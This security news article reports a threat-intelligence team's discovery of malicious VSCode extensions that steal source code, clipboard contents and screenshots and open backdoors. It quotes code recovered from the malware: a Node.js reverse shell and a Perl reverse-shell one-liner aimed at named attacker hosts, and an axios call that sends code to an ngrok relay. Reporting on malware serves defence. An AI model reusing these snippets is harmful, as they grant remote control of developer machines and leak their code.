VSCode Supply Chain Compromise: 12 Malicious Extensions Steal Source Code and Open Remote Shells

The HelixGuard Threat Intelligence Team has uncovered a widespread supply chain compromise affecting the Visual Studio Code (VSCode) extension marketplace, identifying at least 12 malicious plugins, four of which remained live at the time of discovery. These extensions were found to steal source code, exfiltrate credentials, capture screenshots, and even open remote shells on developer machines.

The extensions—hosted both on the official Microsoft VSCode Marketplace and OpenVSX—target developers using AI-assisted coding and DevOps tools. This marks a growing trend where attackers exploit integrated development environments (IDEs) as a supply chain infiltration vector, similar to earlier compromises seen in npm and PyPI ecosystems.

As VSCode cements its status as the world’s most popular code editor, attackers have begun weaponizing its extension ecosystem.

HelixGuard cites research from an arXiv study titled “Developers Are Victims Too: A Comprehensive Analysis of the VS Code Extension Ecosystem”, noting that “approximately 5.6% (2,969) of 52,880 extensions exhibit suspicious behavior, with these suspicious extensions accumulating 613 million installs.”

The report warns that malicious IDE extensions now act as full-fledged malware loaders: “Attackers may use malicious IDE plugins to steal code from developers’ hosts, pilfer sensitive data from the clipboard, and establish remote backdoors, posing high security risks.”

HelixGuard detailed each plugin’s capabilities, exposing how they quietly integrate malicious JavaScript code within legitimate VSCode workflows. Among the most notable were:

1. Christine-devops1234.scraper — Source code theft via hardcoded server

This plugin exfiltrates project names, file contents, search queries, selected code, and even images to an attacker-controlled endpoint 35.164.75.62:8080.

HelixGuard reports: “The Christine-devops1234.scraper VSCode plugin steals sensitive data such as user machine ID, project names, source code file contents, search queries, chat prompts, selected code, and images.”

2. Kodease.fyp-23-s2-08 — Exfiltration to Ngrok tunnel

This plugin sends user code snippets to an Ngrok relay at 9691-34-83-7-143.ngrok-free.app. The injected script posts selected code directly after being processed:

axios.post("https://9691-34-83-7-143.ngrok-free.app", { code: code });

HelixGuard noted, “The Kodease.fyp-23-s2-08 VSCode plugin sends user code to an attacker-controlled Ngrok server.”

3. teste123444212.teste123444212 — Persistent remote backdoor

This plugin connects to an AWS EC2 instance (ec2-18-222-167-218.us-east-2.compute.amazonaws.com:443) and allows the attacker to execute arbitrary commands.

The embedded code creates a reverse shell, granting direct access to the victim’s terminal:

//extension.js
let IP = "ec2-18-222-167-218.us-east-2.compute.amazonaws.com";
let Port = 443;
var client_sock = new net.Socket();
client_sock.connect(Port, IP, () => {
    client_sock.pipe(shell.stdin);
    shell.stdout.pipe(client_sock);
    shell.stderr.pipe(client_sock);
});

HelixGuard explains, “The plugin establishes a persistent connection with an attacker-controlled server, allowing remote code execution on the user’s host.”

4. ToToRoManComp.diff-tool-vsc — Linux shell backdoor

A sophisticated payload in this plugin establishes a shell session to a remote IP (89.104.69.35:445), executed via obfuscated Bash commands.

After decoding, the script reveals a Perl-based reverse shell:

perl -e 'use Socket;$i="89.104.69.35";$p=445;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

5. BX-Dev.Blackstone-DLP — Clipboard and screenshot surveillance

This plugin periodically captures screenshots and clipboard data and uploads them to CloudFront under d1hnchthod2r9c.cloudfront.net.

The report states, “The BX-Dev.Blackstone-DLP VSCode plugin steals user information such as screen captures and clipboard contents.”

Several malicious components demonstrate installation detection and anti-analysis capabilities.

For example, the GuyNachshon.cxcx123 extension performs a network beacon upon installation, contacting a webhook at https://webhook.site/daea041c-4c7b-4c56-97cf-1d6b2be569b5. HelixGuard highlights that “this behavior allows attackers to detect outbound connectivity of the user’s host and verify infection.”

Meanwhile, VKTeam.ru, one of the most complex threats, gathers system metadata, including usernames, hostnames, and domain names, sending them to 188.124.39.62.

Its code dynamically constructs a Base64-encoded payload containing victim data and sends it over HTTP using Axios.

The HelixGuard team warns that malicious VSCode extensions can serve as initial access points into corporate networks, given the level of integration between development tools and production systems.

“Malware in IDE plugins is a supply chain attack channel that enterprise security teams need to take seriously,” the researchers emphasize.

Once a developer’s IDE is compromised, attackers can pivot into internal repositories, inject code into builds, or exfiltrate intellectual property. This makes IDE-level malware particularly dangerous for DevOps pipelines and AI-assisted codebases.

Related Posts:

• APT29 Lures Victims with Fake BMW Ads in Latest Attack
• Beware of Malicious Extensions: Researcher Exposes VSCode Marketplace Threats
• Stealthy Cyberattack Turns Visual Studio Code into a Remote Access Tool
• Malicious VSCode Extensions Caught Mining Crypto with XMRig
• Critical VSCode Supply Chain Flaw: 550+ Secrets Leaked Via Extensions, Exposing 100K+ Users to Malware